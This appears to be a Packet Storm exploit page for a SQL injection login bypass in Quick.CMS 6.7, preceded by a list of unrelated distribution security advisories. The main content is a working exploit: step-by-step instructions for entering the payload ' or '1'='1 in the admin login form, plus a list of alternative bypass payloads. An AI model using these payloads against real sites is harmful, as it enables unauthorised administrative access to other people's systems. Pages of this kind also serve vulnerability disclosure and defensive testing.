Debian Security Advisory 5804-1

Ubuntu Security Notice USN-6882-2

Kernel Live Patch Security Notice LSN-0107-1

Red Hat Security Advisory 2024-9019-03

Red Hat Security Advisory 2024-8690-03

Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass# Google Dork: N/A# Date: 02-03-2024# Exploit Author: ./H4X.Forensics - Diyar# Vendor Homepage: https://www.opensolution.org<https://www.opensolution.org/># Software Link: [https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip]# Version: 6.7# Tested on: Windows# CVE : N/AHow to exploit :*--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php*--> Enter any Email like : root@root.com<mailto:root@root.com>*--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1*--> Tick the Checkbox*--> Press Login*--> Congratz! *--> SQL Injection Authentication Bypass Payload : ' or '1'='1*--> Payloads Can be use :' or '1'='1' or ''='' or 1]%00' or /* or '' or "a" or '' or 1 or '' or true() or '

Headline

Quick.CMS 6.7 SQL Injection

Packet Storm: Latest News